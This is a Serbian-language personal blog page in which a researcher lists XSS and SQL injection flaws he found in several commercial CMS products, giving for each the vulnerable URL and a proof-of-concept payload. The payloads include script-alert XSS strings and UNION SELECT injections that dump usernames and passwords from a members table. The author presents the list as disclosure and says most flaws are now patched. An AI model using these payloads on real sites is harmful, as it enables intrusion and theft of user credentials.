Predrag Cujanović

Menu

Lista sigurnosnih propusta koje sam otkrio

SQLi, XSS, ...

Lista za sada sadrži XSS i SQLi sigurnosne propuste komercijalnih web aplikacija.

 

BGS CMS XSS:

Softver: BGS CMS

Web Sajt: www.bgs-cms.com

Ranjiva adresa: https://www.server/?action=search&search=[XSS]

PoC(Proof of Concept):
https://www.server/?action=search&search=<script>alert(String.fromCharCode(88,+83,+83));</script>

 

 

Anantasoft Gazelle CMS XSS:

Softver: Anantasoft Gazelle CMS

Web Sajt: https://www.anantasoft.com

Ranjiva adresa: https://www.server/search.php?lookup=[XSS]

PoC(Proof of Concept):
https://www.server/search.php?lookup=<script>alert(String.fromCharCode(88, 83, 83));</script>

 

 

Corvus CMS XSS:

Softver: Corvus CMS

Web Sajt: https://www.corvuscms.hr/cms-rjesenja-24.aspx

Ranjiva adresa: https://server/Content/Search.aspx?q=[XSS]

PoC(Proof of Concept):
https://www.server/Content/Search.aspx?q=<script>alert(String.fromCharCode(88, 83, 83));</script>

 

 

Spectrum Software WebManager CMS XSS:

Softver: Spectrum Software WebManager CMS XSS

Web Sajt: https://www.spectrum.hr/proizvodi/web_manager_-_cms/default.aspx

Ranjiva adresa: https://www.server/Search_1.aspx?pojam=[XSS]

PoC(Proof of Concept):
https://www.server/Search_1.aspx?pojam=<script>alert(String.fromCharCode(88,83, 83));</script>

 

 

Vito CMS SQL Injection:

Softver: Vito CMS SQL Injection

Web Sajt: https://kameleon-lab.com/vito-cms.php

Ranjiva adresa: https://server/duga_vest.php?id=1[SQLi]

PoC(Proof of Concept):
https://server/duga_vest.php?id=-217+UNION+SELECT+1,2,3,group_concat

(id,0x3a,username,0x3a,password,0x3a),5,6,7,8+from+members–

 

 

LINK CMS SQL Injection:

Softver: LINK CMS SQL Injection

Web Sajt: https://www.link-softsolutions.com/SoftLink-Content-Management-System—CMS_20_1

Ranjiva adresa: https://server/navigacija.php?jezik=lat&IDMeniGlavni=6

&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]

PoC(Proof of Concept):
https://server/navigacija.php?jezik=lat&IDMeniGlavni=6&

IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63+UNION+SELECT+1,

CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4–

 

 

Clicker CMS Blind SQL Injection:

Softver: Clicker CMS Blind SQL Injection

Web Sajt: n/a

Ranjiva adresa: https://server/index.php?lang=4[BSQLi]

PoC(Proof of Concept):
https://server/index.php?lang=4 and substring(@@version,1,1)=5– (tačno ili netačno)

https://server/index.php?lang=4 and substring(@@version,1,1)=4– (netačno ili tačno)

Deo je objavnjen na sajtovima koji se bave skupljanjem i verifikacijom nađenih sigurnosnih propusta exploit-db.com, packetstormsecurity.org i secunia.com .

Danas je većina ovih softvera “zakrpljenja”.

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *